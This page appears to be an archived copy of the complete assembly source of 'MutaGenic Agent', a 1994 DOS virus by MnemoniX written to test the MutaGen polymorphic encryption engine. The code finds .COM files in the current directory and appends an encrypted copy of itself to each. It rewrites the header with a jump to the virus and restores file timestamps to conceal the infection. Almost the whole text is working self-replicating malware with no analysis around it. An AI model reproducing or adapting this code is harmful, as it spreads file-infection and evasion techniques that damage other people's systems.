home *** CD-ROM | disk | FTP | other *** search
- ; MutaGenic Agent - MutaGen Test Virus
- ; by MnemoniX 1994
- ;
- ; This is an ordinary run-of-the-mill virus that infects a .COM file in
- ; the current directory on run and uses MutaGen to encrypt itself.
-
- MGEN_SIZE equ 1032 ; size of MutaGen
-
- ID equ 'MG' ; ID word
- MAX_INFECTIONS equ 2 ; infections per run
-
- extrn _MUTAGEN:near ; call MutaGen
-
- code segment byte public 'code'
- org 100h
- assume cs:code,ds:code,es:code,ss:code
-
- start:
- db 0E9h,03h,00h ; jmp virus_begin
- dw ID
-
- host:
- db 0CDh,020h,00
-
- virus_begin:
- call $+3 ; BP serves as pointer
- pop bp
- sub bp,offset $-1
-
- mov byte ptr [bp+offset infect],0 ; clear infection flag
-
- mov ah,2Fh ; get original DTA address
- int 21h ; and save it
- push bx
-
- lea dx,[bp+END_MGEN] ; set our DTA to the end of the
- mov ah,1Ah ; virus code
- int 21h
-
- call infect_search ; infection routine ...
-
- pop dx ; ... and we're done
- mov ah,1Ah
- int 21h
-
- mov di,100h ; enter in original five bytes of host
- push di ; save DI as host address
- lea si,[bp+offset prog_len] ; get address of original host header
- mov si,[si] ; found at end of host program
- add si,100h
- movsb ; move five bytes
- movsw
- movsw
-
- ret ; and call host
-
- infect_search proc near
-
- mov ah,4Eh ; search for first .COM file
- lea dx,[bp+com_file] ; in directory
- xor cx,cx
- int 21h
- jnc infect_file ; none present, leave
- jmp inf_complete
-
- infect_file:
- mov ax,3D02h ; .COM file found, open
- lea dx,[bp+END_MGEN+1Eh]
- int 21h
-
- mov bx,ax ; file handle in BX
- mov ax,5700h ; get file date and time
- int 21h ; and save it
- push cx
- push dx
-
- lea dx,[bp+orig_header] ; now read in first five bytes
- mov cx,5 ; of the file
- mov ah,3Fh
- int 21h
-
- mov ax,4202h ; no, infect this file
- call move_pointer ; (this call is to save bytes)
-
- cmp ax,64000
- jae infected ; file is too big, skip it
- cmp [bp+offset orig_header+3],ID
- je infected ; if previously infected, skip it
-
- lea si,[bp+offset new_jump+1]
-
- push [bp+offset prog_len] ; save original program length
- mov [bp+offset prog_len],ax ; store this program length
-
- add ax,2
- mov [si],ax
-
- lea dx,[bp+offset orig_header] ; store first five bytes of file
- mov cx,5 ; at end of file
- mov ah,40h
- int 21h
-
- ; MutaGen calling routine
- push bx
- push bp
- mov dx,[si] ; MutaGen offset calculation
- add dx,103h
- mov cx,VIRUS_SIZE ; write VIRUS_SIZE bytes
- lea di,[bp+END_MGEN+80h] ; store at end of virus
- lea si,[bp+offset virus_begin]
- call _MUTAGEN
-
- pop bp
- pop bx
- lea dx,[bp+offset END_MGEN+80h] ; write encrypted code
- mov ah,40h ; to file
- int 21h
-
- pop [bp+offset prog_len] ; restore original program length
-
- mov ax,4200h ; lastly, add our new jump instruction
- call move_pointer ; to the beginning of the file
-
- lea dx,[bp+offset new_jump]
- mov cx,5 ; write five bytes to file
- mov ah,40h
- int 21h
-
- inc byte ptr [bp+offset infect] ; set infection flag
-
- infected:
- pop dx ; restore time and date
- pop cx
- mov ax,5701h
- int 21h
-
- mov ah,3Eh ; close file
- int 21h
-
- cmp byte ptr [bp+offset infect],1 ; did an infection occur?
- je inf_complete ; yes, go
-
- mov ah,4Fh ; find another file
- int 21h ; and repeat
- jc inf_complete ; none found, quit
- jmp infect_file
- inf_complete:
- ret
-
-
- move_pointer:
- xor cx,cx ; i'm being really stingy with space
- xor dx,dx ; here ...
- int 21h
- ret
-
- endp
-
- com_file db '*.COM',0 ; .COM file
- orig_header db 5 dup(0) ; first three bytes of program
- new_jump db 0E9h,00,00 ; new jump instruction
- dw ID ; ID signature
- prog_len dw 3 ; length of file for return sequence
- infect db 0
- sig db '[MutaGenic Agent]',0
-
- virus_end:
-
- END_MGEN equ virus_end + MGEN_SIZE
- VIRUS_SIZE equ virus_end - virus_begin + MGEN_SIZE
-
- code ends
- end start
-
-